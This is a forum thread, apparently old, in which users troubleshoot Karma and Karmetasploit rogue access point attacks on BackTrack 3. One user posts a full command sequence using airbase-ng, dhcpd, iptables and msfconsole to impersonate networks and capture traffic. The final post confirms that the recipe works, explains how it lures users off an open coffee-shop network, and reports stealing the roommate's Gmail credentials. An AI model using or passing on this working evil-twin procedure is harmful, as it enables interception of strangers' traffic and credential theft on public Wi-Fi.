karma on BT3

[kelsar56]

Alright so recently I have been playing around with karma on backtrack 3. I know that this is suppose to be about Jasager, but I don't own a fon router and because college costs so much these days I don't have more than $20 in the bank. So I have been trying to get karma working on BT3.

The problem that I run into is that my Intel® PRO/Wireless 3945ABG Network Card has trouble injecting packets onto wireless networks. I have looked around a bit and people on other forums say to get around the packet injection problem if you do a (excuse my code if it is wrong I can't get to it atm) "modprobe -r iwl3945" after that then run "modprobe ipwraw" I have tried this and it works to some degree. For the most part I start off by running "iwconfig" to see if wifi0 is there then turn it on with "ifconfig wifi0 up" then I try "airmon-ng start wifi0" this seems to work it tells me that the card is in monitor mode.

Where I run into trouble is when I try to do "aireplay-ng --test wifi0" to do the packet injection. When if first runs it injects a single packet then after that will not inject anything. For some reason it seems to be very glitchy. I have learned everything I know about linux from online sources mainly and I am by no means a pro, so I could be doing something wrong here.

The weird thing is the single packet injection because after this point if I browse to the karma folder then do "(cd ./src/ && make) && ./src/karma wifi0" it picks up probes and seems to work, but if I run one of the scripts if screws up when it starts the dns. Any suggestions?

btw if you would like more info or any outputs just let me know what you need

[digininja]

First off, forget karma if you are running on an intel chipset, it only works with Atheros.

The Karma framework doesn't work on BT3, whoever built it didn't test it because there are chunks of code missing and others that are from different versions. I tried to report this on the remote exploit forums but was kind of ignored. I wrote a chunk of the framework, I know what works and doesn't!

If you want to do Karma like things the look at airbase-ng instead, that works with any card that will do monitor mode but will only work in userland not in kernel land as Karma does.

[Netshroud]

First off, forget karma if you are running on an intel chipset, it only works with Atheros.

So how would I go about running Karma on my AR5005GS-based card?

[digininja]

If you want to run it with bt3 then have a look for my post on the pauldotcom forum on getting it working. There is a long discussion and I think I posted a working tarball and instructions on getting it all working. Its been a while!

[kelsar56]

Umm.. I have been trying something different not to completely ignore your advice digininja I know you know a lot more about this than me, but would it be possible to do something like this.

by starting off I open a command prompt in bt3 and do the following on a clean install of BT3 on my usb

ifconfig wlan0 up // turn on the wireless card

modprobe -r iwl3945 // get rid of the iwl3945 driver

modprobe ipwraw // add this driver to allow me to monitor and sort of inject packets

airmon-ng start wifi0 // start monitoring packets

aireplay-ng --test wifi0 // test the packet injection this creates the issues with only one packet being injected total

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng // I update aircrack-ng because bt3 doesn't have the latest version

cd aircrack-ng

make

make install

sudo airodump-ng-oui-update

modprobe tun // I run this because for some reason without it I can't pose as an access point

airbase-ng -P -C 30 -e "Free Wifi" -v wifi0 // I pose as an AP with this command -P to respond to probes -C to wait 30 seconds before changing ssid's -e to create a starting ssid -v to report more and wifi0 is the interface I wanted to use

I then open up a different command prompt and do the following what that is running

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 // I set up at0 with the network info

dhcpd -cf /etc/dhcpd.conf at0 // I start up the DHCP server with the config that it comes with

iptables -t nat -A PREROUTING -i at0 -j REDIRECT // This is a command overcomes cached DNS issues

tcpdump -i at0 > /root/tcptraffic // This tracks packets on the AP

then I update metasploit 3 by doing the following

cd /pentesting/exploits/framework3

rm -r data

svn update // I do this to update metasploit 3

I then try to get karma going in msfc from the start menu and once it is up I do

msfconsole -r karma.rc // This starts karma up in metasploit

From this point it sort of works sort of doesn't because I dont completely know what all I'm doing I try to connect My pda to my wireless router it connects fine. One time my roommate was on his computer and tried to connect to the Free Wifi SSID and it connected. He tried to go to google and something came up saying hotel connection loading, but it never went farther than that. Like I said before I am stuck with my limited equipment.

If karma doesn't work with intel chips then what could you suggest me to do with airbase-ng I am unsure of how to use it for the most part?

Anyone have any suggestions on what I might need to do to get users to connect to my AP or does anyone know some linux commands in BT3 that might come in handy when working with this type of thing? Also any idea about the single packet injection?

here is the site i got most of my info from http://www.metasploit.com/redmine/projects...i/Karmetasploit there are others, but this was the main one

[digininja]

Here you are running a mix of Karmetasploit and airbase-ng so you've lost me for support, I only do the original Karma.

[kelsar56]

Alright well thank you for looking into it anyway I appreciate it.

[kelsar56]

Does anyone have any else have any ideas of cool wireless hacks I could use? I am just going present them in my security class. Looking for something dealing with karma or something else related to it.

[digininja]

If you want to show off wifi hacks, here are a few good tools

aircrack - demo wep and wpa cracking

wifish - work out client encryption types

cafe late attack - crack wep just using a client

kismet newcore - just show the amount of wifi around, surprises a lot of people

If you have a gps, do some war driving then show the maps in google earth with giskismet

[kelsar56]

thanks again digi you are very helpful

[digininja]

I try!

[kelsar56]

okay I solved the problem I was having here if you look at post number 5 do everything that I did and it works. Trouble was that I was testing it on networks that required WEP keys. So if there is an open network around like a coffee shop network and the SSID is named "Coffee Shop" and you follow the commands I have above then it will make a network called "Free Wifi" then anyone who tries to connect to the open "Coffee Shop" network will be redirected to you and metasploit will look for information on them from there. By having my roommate test some of this for me I got his gmail username and password within a matter of seconds. If you have any questions on this feel free to message me or add to this post.